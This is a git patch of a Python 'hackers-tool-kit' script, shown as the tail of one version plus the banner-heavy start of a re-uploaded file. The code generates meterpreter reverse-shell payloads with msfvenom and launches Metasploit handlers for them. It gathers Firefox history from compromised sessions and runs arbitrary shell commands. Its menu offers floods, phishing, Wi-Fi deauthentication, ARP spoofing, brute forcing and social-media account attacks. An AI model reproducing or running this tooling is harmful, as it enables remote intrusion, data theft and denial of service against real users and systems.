- os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From be9ad8d41ab08e31474f88db2c43c2cf2a912919 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 28 May 2019 05:42:59 +0100 Subject: [PATCH 155/214] Add files via upload --- htk.py | 3079 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3079 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..693eb2a --- /dev/null +++ b/htk.py @@ -0,0 +1,3079 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ 